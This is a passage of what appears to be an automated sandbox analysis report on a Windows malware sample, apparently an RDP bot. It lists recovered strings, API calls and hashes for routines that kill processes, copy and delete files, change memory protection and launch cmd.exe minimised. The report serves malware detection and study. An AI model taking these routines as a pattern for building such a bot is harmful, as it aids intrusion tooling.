                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                  • API String ID: 1004003707-2568489879
                  • Opcode ID: 987dfc7314daebac08b7d1d03a222a5fd5fa2b1a15d552217955ab942cc0a28e
                  • Instruction ID: 3600b38c80b2179724c7b9ad62234608651b74bce66d011e814aa1fc04db6b05
                  • Opcode Fuzzy Hash: 987dfc7314daebac08b7d1d03a222a5fd5fa2b1a15d552217955ab942cc0a28e
                  • Instruction Fuzzy Hash: 29412D61A09747DAFA15BB04E9007F5A360FB05384FE441FADA5C9A195DF7CE989C320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                  • API String ID: 1004003707-3977765790
                  • Opcode ID: c37977804aa331a37b850de826347f7ffc720abc1c8905eb7b42f2c147ac0dd7
                  • Instruction ID: 2ef33472e9d77411d1af4ac370c6189dd14edbc4ae7a78655ec1bcac94da8e2b
                  • Opcode Fuzzy Hash: c37977804aa331a37b850de826347f7ffc720abc1c8905eb7b42f2c147ac0dd7
                  • Instruction Fuzzy Hash: 0A416261A09747D6FA12BB00E9007B4A750FF01388FF441FADA5C8A5A5EF7CEA85C320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                  • API String ID: 2918714741-719680006
                  • Opcode ID: b647b4fb1f849b18d37e1820531bc261b777ad14990052b4b0321f78fd1f4710
                  • Instruction ID: 78e8a9905c70842b90029c04737d37d25279da20b546f3e6909ab4a92fd76da0
                  • Opcode Fuzzy Hash: b647b4fb1f849b18d37e1820531bc261b777ad14990052b4b0321f78fd1f4710
                  • Instruction Fuzzy Hash: 1E216261A08746DAF722BF14EC407A9B7A4BB45784FA440B5EE8C87654DF7CD885CB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: _errno
                  • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                  • API String ID: 2918714741-719680006
                  • Opcode ID: 473512c0c2058ff943e3dd15818fe718e05bfa88496eb265e96496a5be53cbc8
                  • Instruction ID: 56f7bb06b52edabb2b54db7210d7814a72285257f1ba0087e956df4e217e29d3
                  • Opcode Fuzzy Hash: 473512c0c2058ff943e3dd15818fe718e05bfa88496eb265e96496a5be53cbc8
                  • Instruction Fuzzy Hash: 9521E261A08E4396E7229F66F8407AE3369BB447A4F4441B6EE8C47674DF7CD945C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                  • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 477549591-1116693529
                  • Opcode ID: 287bc51cedacec2085a2b6bbd98ea20e627747aadacb9a38d55f742ae79f1610
                  • Instruction ID: 934095f5559e1375f5b48b1b764efe8e8d514c29d6168c1011ab626ce38d276c
                  • Opcode Fuzzy Hash: 287bc51cedacec2085a2b6bbd98ea20e627747aadacb9a38d55f742ae79f1610
                  • Instruction Fuzzy Hash: 7F218E59F0CF0346FB659FA7A4C037E139AAF547A0F0440B9CC0E462B5EE2DE9488341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                  • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 477549591-1116693529
                  • Opcode ID: 10e7ed104809cb2c5c3085f8bda7e35f7484c2652a7858b90afc65e94441acdf
                  • Instruction ID: f8aedc411b760dacd0c8bf5a382f433f687d7e28fb9ae496b94c05040c345051
                  • Opcode Fuzzy Hash: 10e7ed104809cb2c5c3085f8bda7e35f7484c2652a7858b90afc65e94441acdf
                  • Instruction Fuzzy Hash: E3218E59F0CF0346FB659FA7A4D037E139AAF507A0F0444B9CC0E462B5EE2DE9488341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                  • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 477549591-1116693529
                  • Opcode ID: 690b58d102fe84c2b86515d0c4965d340f10ee8ca09de28bfe570b5747ffb1e4
                  • Instruction ID: bce896ad159b2367b25f385f6d9e89c230b75b340d259f634dac575b50acd7b9
                  • Opcode Fuzzy Hash: 690b58d102fe84c2b86515d0c4965d340f10ee8ca09de28bfe570b5747ffb1e4
                  • Instruction Fuzzy Hash: 3E218C59F0CF0346FB659FA7A0D037E239AAF50BA1F0444B9CC0E462B5EE2DE9488341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastProcess$CloseHandleNextOpenProcess32Terminatestrcmp
                  • String ID: [E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 477549591-1116693529
                  • Opcode ID: 200fecf984d99c778fc9d4cf007665976587b1201818771fa11b1826471faf7d
                  • Instruction ID: b67f50d4ad18e3d70335e14a4826c2a9bc5c6b695fb1f38343918f19e74bb989
                  • Opcode Fuzzy Hash: 200fecf984d99c778fc9d4cf007665976587b1201818771fa11b1826471faf7d
                  • Instruction Fuzzy Hash: 45218C59F0CF0346FB659FA7A0C037E239AAF50BA0F0444B9CC0E462B5EE2DE9488341
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                  • API String ID: 384173800-4041758303
                  • Opcode ID: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                  • Instruction ID: 2b607826e2c448567f1bef85bdea1ae55a8ade4129dda40189a0585a9cc5f9f4
                  • Opcode Fuzzy Hash: 5291cd93b414ba6c424e77f612c9ff6642894636800bc1888b68a92809d904ce
                  • Instruction Fuzzy Hash: A7F0BD64E0AB17D4F906FB51FC44064A7A4AF59798BE401B6C81D97360EE2CAD4AC720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                  • API String ID: 384173800-4041758303
                  • Opcode ID: 506ee0f3f3ca59bbb06e7e868019388be36614ff2e6b08981a805f7823c04824
                  • Instruction ID: fe72d306c91116fe9a1e6ed6d24defc2b79674d01f28da50e3365e3a765c42c9
                  • Opcode Fuzzy Hash: 506ee0f3f3ca59bbb06e7e868019388be36614ff2e6b08981a805f7823c04824
                  • Instruction Fuzzy Hash: 10F0B225A1BE17A0EB16EB23FC545A427AABF587A4F8445B2C80D06330EE2CA54AC300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CopyErrorFileLastfflushfwrite
                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                  • API String ID: 2887799713-3464183404
                  • Opcode ID: 54de73e146ac7064324100addf3f4ba1824c82c16014dbecaa786215b2cebb3d
                  • Instruction ID: e2c45d7846a6153bddb66184767f880b82d1229028d415b55ac4bfb56984a757
                  • Opcode Fuzzy Hash: 54de73e146ac7064324100addf3f4ba1824c82c16014dbecaa786215b2cebb3d
                  • Instruction Fuzzy Hash: BF419661E2CE1781F7218A97A4003FD265DBF05BBDE5911BAD90F472B0EE7DE6418701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                  • API String ID: 2018770650-4119452840
                  • Opcode ID: c21b6aeb0182c77b96eaafe1d01d6e28c3d2b4e6756fc38210943da2775030a1
                  • Instruction ID: 9c306574ab49fa7dbe5a399a0f776a54a82223923168fb944f3e3d88b3f36288
                  • Opcode Fuzzy Hash: c21b6aeb0182c77b96eaafe1d01d6e28c3d2b4e6756fc38210943da2775030a1
                  • Instruction Fuzzy Hash: 39315E52E1CE0786FB329687A4483BD294E4F41375F5900BEC92E473B5EE6CAC858203
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                  • API String ID: 39653677-2979476222
                  • Opcode ID: 30e48ffb3e4467a7c56c0ef273bd327010d49d220472400fb6c61673ee193160
                  • Instruction ID: b292c9b088ef8e1255aa5498b520a98284a7d732e82b9022731f28155d1fd0fe
                  • Opcode Fuzzy Hash: 30e48ffb3e4467a7c56c0ef273bd327010d49d220472400fb6c61673ee193160
                  • Instruction Fuzzy Hash: C551DE51E0CB87D9FA11AB1599503BAA6517B127D8FF440FADE4E8B291DE3CA901C320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
                  • String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
                  • API String ID: 2011334650-1527096901
                  • Opcode ID: a896232022ea3a4dac404a97486e60f1f2b53ef0e47165ade3ff46fcc3061495
                  • Instruction ID: 67b12ce123dfcb8beb88a15c1c83ff88ff456cae129f559e8b76454aeaef5ebb
                  • Opcode Fuzzy Hash: a896232022ea3a4dac404a97486e60f1f2b53ef0e47165ade3ff46fcc3061495
                  • Instruction Fuzzy Hash: BB212F50E4EE0690FF529B97E8D41783359AF44BB4F4844B9CD0E47375EE2CE9858312
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: CloseHandle$EnvironmentExpandObjectSingleStringsWaitstrcpy
                  • String ID: ($-RGMGRP-$/min$ORRE$cmd.exe$start
                  • API String ID: 2015099158-1150742974
                  • Opcode ID: 8d0f3c23c94b47aae8ab67239b8eed1acd430e4788797e24a8d47570cc03ed35
                  • Instruction ID: 27efede4b156430023b4924f4ebd4aebaa686b212069b0add9ff71443cca187e
                  • Opcode Fuzzy Hash: 8d0f3c23c94b47aae8ab67239b8eed1acd430e4788797e24a8d47570cc03ed35
                  • Instruction Fuzzy Hash: 8C51C236A08F8285E7218B56E4403FE73A9EB847A4F40427ADA8D47BB5EF3CD549C740
                  APIs
                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A1DD
                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A244
                  • GetLastError.KERNEL32(?,?,?,?,00007FF76A9150F8,00007FF76A915100,00007FF76A900000,?,?,00007FF76A90A348,?,?,00007FF76A9184F8,00000000), ref: 00007FF76A90A24E
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Virtual$ErrorLastProtectQuery
                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                  • API String ID: 637304234-2123141913
                  • Opcode ID: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                  • Instruction ID: 5a848abc75bcc1767608d2847cd5483fdb36bbe29aece569b0c9ba3018d6e0f6
                  • Opcode Fuzzy Hash: 6903964d322ee31ad0e95d65d8f33e82ba9bc0ba0f8e816a8c1169f1d38d6b35
                  • Instruction Fuzzy Hash: EA31E475B09B02C9FA05AF19E8801B9B361EF85BD8FA481B9DD0D87794DE3CE845C790
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Virtual$ErrorLastProtectQuery
                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                  • API String ID: 637304234-2123141913
                  • Opcode ID: 53435919785d44fabd46a964e909bdfa347527f1b757c0e445b993f3e6d3f1bf
                  • Instruction ID: 889a29139d0caca5ec544f4ce804cc2ba9a37d594fb4fd68ced37b31382ed187
                  • Opcode Fuzzy Hash: 53435919785d44fabd46a964e909bdfa347527f1b757c0e445b993f3e6d3f1bf
                  • Instruction Fuzzy Hash: BB319172B09F4285EB119F57E88056C676AEF86BA4F4481B9DE0D073B4DE3CE485C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: inet_addr
                  • String ID: (s != NULL)$(v != NULL)$H:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
                  • API String ID: 1393076350-2916536452
                  • Opcode ID: 856ccb1ac7e905e62fd55fe33b648935fc0db266156acb32b13718a822532609
                  • Instruction ID: ca27b736255fc436e72a7aaa86e8a47a564abb30ddc294a7bae83445ef8cef08
                  • Opcode Fuzzy Hash: 856ccb1ac7e905e62fd55fe33b648935fc0db266156acb32b13718a822532609
                  • Instruction Fuzzy Hash: 841130E4A0CE0796FB519FA6E8203B8239ABF00374F5449B6D50D4A2B6DF3DE945C301
                  APIs
                    • Part of subcall function 00007FF76A901694: LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2
                  • GetLastError.KERNEL32 ref: 00007FF76A901818
                    • Part of subcall function 00007FF76A901613: GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastLibraryLoadProc
                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                  • API String ID: 3511525774-1584720945
                  • Opcode ID: c42ed83aae933e437515cd80b13881595a2d18c916c862bd0cfde7413737ae74
                  • Instruction ID: 87be8a9c4bc80f47187ffb55be7d0dd7d06e67e26b3d1e741d60cdc10d01fab3
                  • Opcode Fuzzy Hash: c42ed83aae933e437515cd80b13881595a2d18c916c862bd0cfde7413737ae74
